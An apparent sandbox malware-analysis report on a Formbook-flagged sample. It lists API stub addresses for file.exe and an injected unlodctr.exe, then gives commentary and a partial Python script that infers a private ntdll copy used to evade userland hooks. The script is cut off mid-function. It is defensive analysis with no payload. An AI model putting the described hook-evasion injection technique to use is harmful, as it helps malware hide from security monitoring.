Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082FA0 NtQuerySection, 8_2_03082FA0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082E30 NtWriteVirtualMemory, 8_2_03082E30
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082EA0 NtAdjustPrivilegesToken, 8_2_03082EA0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082D00 NtSetInformationFile, 8_2_03082D00
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082DB0 NtEnumerateKey, 8_2_03082DB0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082C00 NtQueryInformationProcess, 8_2_03082C00
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082CC0 NtQueryVirtualMemory, 8_2_03082CC0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082CF0 NtOpenProcess, 8_2_03082CF0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03083010 NtOpenDirectoryObject, 8_2_03083010
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03083090 NtSetValueKey, 8_2_03083090
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03083D10 NtOpenProcessToken, 8_2_03083D10
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03083D70 NtOpenThread, 8_2_03083D70
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00377660 NtCreateFile, 8_2_00377660
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_003777C0 NtReadFile, 8_2_003777C0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_003778A0 NtDeleteFile, 8_2_003778A0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00377930 NtClose, 8_2_00377930
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00377A80 NtAllocateVirtualMemory, 8_2_00377A80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_010BD74C 0_2_010BD74C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0511C258 0_2_0511C258
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0511D285 0_2_0511D285
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0704E5A0 0_2_0704E5A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07040AC8 0_2_07040AC8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_070423A3 0_2_070423A3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_070423B0 0_2_070423B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0704CBE8 0_2_0704CBE8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07042018 0_2_07042018
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07042028 0_2_07042028
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_070D6740 0_2_070D6740
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_070D6750 0_2_070D6750
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_070D4C40 0_2_070D4C40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_070D54A1 0_2_070D54A1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_070D54B0 0_2_070D54B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_070D64F0 0_2_070D64F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_070D6B88 0_2_070D6B88
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_070DB930 0_2_070DB930
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_070D5078 0_2_070D5078
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07048D70 0_2_07048D70
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0040F94A 4_2_0040F94A
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0040F953 4_2_0040F953
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0042D273 4_2_0042D273
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_004162F3 4_2_004162F3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_00403280 4_2_00403280
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0040FB73 4_2_0040FB73
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0040DBF3 4_2_0040DBF3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_00401D66 4_2_00401D66
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_00401D70 4_2_00401D70
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_00402640 4_2_00402640
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_00402635 4_2_00402635
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA01AA 4_2_01AA01AA
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A941A2 4_2_01A941A2
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A981CC 4_2_01A981CC
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D0100 4_2_019D0100
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7A118 4_2_01A7A118
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A68158 4_2_01A68158
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A72000 4_2_01A72000
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA03E6 4_2_01AA03E6
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019EE3F0 4_2_019EE3F0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9A352 4_2_01A9A352
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A602C0 4_2_01A602C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A80274 4_2_01A80274
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA0591 4_2_01AA0591
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0535 4_2_019E0535
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A8E4F6 4_2_01A8E4F6
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A84420 4_2_01A84420
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A92446 4_2_01A92446
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DC7C0 4_2_019DC7C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A04750 4_2_01A04750
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FC6E0 4_2_019FC6E0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AAA9A6 4_2_01AAA9A6
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F6962 4_2_019F6962
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019C68B8 4_2_019C68B8
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E8F0 4_2_01A0E8F0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E2840 4_2_019E2840
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019EA840 4_2_019EA840
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A96BD7 4_2_01A96BD7
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9AB40 4_2_01A9AB40
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DEA80 4_2_019DEA80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F8DBF 4_2_019F8DBF
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DADE0 4_2_019DADE0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019EAD00 4_2_019EAD00
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7CD1F 4_2_01A7CD1F
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A80CB5 4_2_01A80CB5
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D0CF2 4_2_019D0CF2
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0C00 4_2_019E0C00
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5EFA0 4_2_01A5EFA0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D2FC8 4_2_019D2FC8
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019ECFE0 4_2_019ECFE0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A22F28 4_2_01A22F28
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A00F30 4_2_01A00F30
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A82F30 4_2_01A82F30
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A54F40 4_2_01A54F40
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F2E90 4_2_019F2E90
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9CE93 4_2_01A9CE93
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9EEDB 4_2_01A9EEDB
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9EE26 4_2_01A9EE26
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0E59 4_2_019E0E59
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019EB1B0 4_2_019EB1B0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AAB16B 4_2_01AAB16B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A1516C 4_2_01A1516C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CF172 4_2_019CF172
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A970E9 4_2_01A970E9
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9F0E0 4_2_01A9F0E0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E70C0 4_2_019E70C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A8F0CC 4_2_01A8F0CC
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A2739A 4_2_01A2739A
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9132D 4_2_01A9132D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CD34C 4_2_019CD34C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E52A0 4_2_019E52A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A812ED 4_2_01A812ED
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FB2C0 4_2_019FB2C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7D5B0 4_2_01A7D5B0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A97571 4_2_01A97571
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9F43F 4_2_01A9F43F
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D1460 4_2_019D1460
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9F7B0 4_2_01A9F7B0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A916CC 4_2_01A916CC
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A75910 4_2_01A75910
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E9950 4_2_019E9950
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FB950 4_2_019FB950
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E38E0 4_2_019E38E0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4D800 4_2_01A4D800
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FFB80 4_2_019FFB80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A55BF0 4_2_01A55BF0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A1DBF9 4_2_01A1DBF9
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9FB76 4_2_01A9FB76
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A25AA0 4_2_01A25AA0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7DAAC 4_2_01A7DAAC
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A81AA3 4_2_01A81AA3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A8DAC6 4_2_01A8DAC6
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A53A6C 4_2_01A53A6C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9FA49 4_2_01A9FA49
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A97A46 4_2_01A97A46
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FFDC0 4_2_019FFDC0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A97D73 4_2_01A97D73
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E3D40 4_2_019E3D40
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A91D5A 4_2_01A91D5A
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9FCF2 4_2_01A9FCF2
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A59C32 4_2_01A59C32
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E1F92 4_2_019E1F92
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9FFB1 4_2_01A9FFB1
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9FF09 4_2_01A9FF09
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E9EB0 4_2_019E9EB0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310A352 8_2_0310A352
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0305E3F0 8_2_0305E3F0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_031103E6 8_2_031103E6
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030F0274 8_2_030F0274
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030D02C0 8_2_030D02C0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03040100 8_2_03040100
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030EA118 8_2_030EA118
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030D8158 8_2_030D8158
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_031041A2 8_2_031041A2
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_031101AA 8_2_031101AA
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_031081CC 8_2_031081CC
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030E2000 8_2_030E2000
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03074750 8_2_03074750
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03050770 8_2_03050770
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0304C7C0 8_2_0304C7C0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0306C6E0 8_2_0306C6E0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03050535 8_2_03050535
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03110591 8_2_03110591
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030F4420 8_2_030F4420
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03102446 8_2_03102446
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030FE4F6 8_2_030FE4F6
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310AB40 8_2_0310AB40
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03106BD7 8_2_03106BD7
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0304EA80 8_2_0304EA80
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03066962 8_2_03066962
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030529A0 8_2_030529A0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0311A9A6 8_2_0311A9A6
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03052840 8_2_03052840
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0305A840 8_2_0305A840
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030368B8 8_2_030368B8
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0307E8F0 8_2_0307E8F0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03092F28 8_2_03092F28
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03070F30 8_2_03070F30
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030F2F30 8_2_030F2F30
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030C4F40 8_2_030C4F40
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030CEFA0 8_2_030CEFA0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03042FC8 8_2_03042FC8
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0305CFE0 8_2_0305CFE0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310EE26 8_2_0310EE26
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03050E59 8_2_03050E59
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310CE93 8_2_0310CE93
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03062E90 8_2_03062E90
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310EEDB 8_2_0310EEDB
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0305AD00 8_2_0305AD00
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030ECD1F 8_2_030ECD1F
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03068DBF 8_2_03068DBF
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0304ADE0 8_2_0304ADE0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03050C00 8_2_03050C00
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030F0CB5 8_2_030F0CB5
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03040CF2 8_2_03040CF2
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310132D 8_2_0310132D
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0303D34C 8_2_0303D34C
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0309739A 8_2_0309739A
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030552A0 8_2_030552A0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0306B2C0 8_2_0306B2C0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030F12ED 8_2_030F12ED
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0308516C 8_2_0308516C
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0303F172 8_2_0303F172
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0311B16B 8_2_0311B16B
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0305B1B0 8_2_0305B1B0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030FF0CC 8_2_030FF0CC
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030570C0 8_2_030570C0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310F0E0 8_2_0310F0E0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_031070E9 8_2_031070E9
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310F7B0 8_2_0310F7B0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03095630 8_2_03095630
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_031016CC 8_2_031016CC
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03107571 8_2_03107571
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030ED5B0 8_2_030ED5B0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_031195C3 8_2_031195C3
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310F43F 8_2_0310F43F
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03041460 8_2_03041460
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310FB76 8_2_0310FB76
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0306FB80 8_2_0306FB80
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0308DBF9 8_2_0308DBF9
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030C5BF0 8_2_030C5BF0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03107A46 8_2_03107A46
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310FA49 8_2_0310FA49
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030C3A6C 8_2_030C3A6C
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030EDAAC 8_2_030EDAAC
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03095AA0 8_2_03095AA0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030F1AA3 8_2_030F1AA3
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030FDAC6 8_2_030FDAC6
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030E5910 8_2_030E5910
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03059950 8_2_03059950
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0306B950 8_2_0306B950
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030BD800 8_2_030BD800
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030538E0 8_2_030538E0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310FF09 8_2_0310FF09
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03051F92 8_2_03051F92
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310FFB1 8_2_0310FFB1
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03013FD2 8_2_03013FD2
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03013FD5 8_2_03013FD5
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03059EB0 8_2_03059EB0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03053D40 8_2_03053D40
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03101D5A 8_2_03101D5A
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03107D73 8_2_03107D73
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0306FDC0 8_2_0306FDC0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030C9C32 8_2_030C9C32
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310FCF2 8_2_0310FCF2
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00361280 8_2_00361280
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0035C450 8_2_0035C450
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0035C447 8_2_0035C447
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0035C670 8_2_0035C670
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0035A6F0 8_2_0035A6F0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00362DF0 8_2_00362DF0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00379D70 8_2_00379D70
Source: C:\Users\user\Desktop\file.exe Code function: String function: 01A15130 appears 58 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 01A5F290 appears 105 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 01A4EA12 appears 86 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 01A27E54 appears 102 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 019CB970 appears 280 times
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: String function: 030BEA12 appears 86 times
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: String function: 03097E54 appears 111 times
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: String function: 0303B970 appears 280 times
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: String function: 030CF290 appears 105 times
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: String function: 03085130 appears 58 times
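The Nt* records above for process 4 (file.exe, addresses 0x01A12xxx to 0x01A14xxx) and process 8 (unlodctr.exe, 0x03082xxx to 0x03084xxx) pair up API by API at one constant offset (NtClose 01A12B60 / 03082B60, NtQueueApcThread 01A12EE0 / 03082EE0, NtCreateMutant 01A135C0 / 030835C0, and so on), and the five "String function" addresses (019CB970 / 0303B970, 01A15130 / 03085130, ...) share the same offset. A constant per-API delta means one code image mapped at two different bases, not two module loads done by the OS loader; together with the "OriginalFilenamentdll.dll" string the report finds at 0x01ACD000 in process 4, this is consistent with a private copy of ntdll that the sample carries into each process it injects, the usual purpose being to reach the Nt* stubs without passing through the ntdll image that a userland hook may have patched. The script below is an added example (not part of this report or of the sandbox's own tooling) that checks this property mechanically on a subset of the records copied from this page: it parses the records, takes a vote on the delta between the two processes, and lists the addresses that do not fit. Here the misfits are the 0x00377xxx wrappers in process 8, which sit inside the region starting at 0x00350000 that matched Windows_Trojan_Formbook_1112e116 above, and the NtClose at 0x0042AE33 in process 4's 0x00400000 image; those are the payload's own syscall wrappers rather than the relocated ntdll copy.

```python
import re
from collections import Counter, defaultdict

# Constructed input: a subset of this report's "Code function" records, copied
# from the page. The full list is longer; these are enough to show the method.
REPORT_LINES = r"""
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0042AE33 NtClose, 4_2_0042AE33
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12B60 NtClose,LdrInitializeThunk, 4_2_01A12B60
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12DF0 NtQuerySystemInformation,LdrInitializeThunk, 4_2_01A12DF0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A135C0 NtCreateMutant,LdrInitializeThunk, 4_2_01A135C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A14340 NtSetContextThread, 4_2_01A14340
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12BF0 NtAllocateVirtualMemory, 4_2_01A12BF0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12AD0 NtReadFile, 4_2_01A12AD0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12D10 NtMapViewOfSection, 4_2_01A12D10
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12FE0 NtCreateFile, 4_2_01A12FE0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12F60 NtCreateProcessEx, 4_2_01A12F60
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12EE0 NtQueueApcThread, 4_2_01A12EE0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A13D70 NtOpenThread, 4_2_01A13D70
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03084340 NtSetContextThread,LdrInitializeThunk, 8_2_03084340
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082B60 NtClose,LdrInitializeThunk, 8_2_03082B60
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_03082BF0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082AD0 NtReadFile,LdrInitializeThunk, 8_2_03082AD0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082FE0 NtCreateFile,LdrInitializeThunk, 8_2_03082FE0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082EE0 NtQueueApcThread,LdrInitializeThunk, 8_2_03082EE0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082D10 NtMapViewOfSection,LdrInitializeThunk, 8_2_03082D10
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082DF0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_03082DF0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030835C0 NtCreateMutant,LdrInitializeThunk, 8_2_030835C0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082F60 NtCreateProcessEx, 8_2_03082F60
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03083D70 NtOpenThread, 8_2_03083D70
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00377660 NtCreateFile, 8_2_00377660
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_003777C0 NtReadFile, 8_2_003777C0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_003778A0 NtDeleteFile, 8_2_003778A0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00377930 NtClose, 8_2_00377930
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00377A80 NtAllocateVirtualMemory, 8_2_00377A80
"""

# "<pid>_<run>_<address> <Api1,Api2,...,> " as the report prints it.
RECORD = re.compile(r"Code function: (\d+)_\d+_([0-9A-Fa-f]{8}) ((?:\w+,)+) ")


def parse_stubs(text):
    """Map pid -> Nt* API name -> set of addresses for every record naming an Nt* API."""
    stubs = defaultdict(lambda: defaultdict(set))
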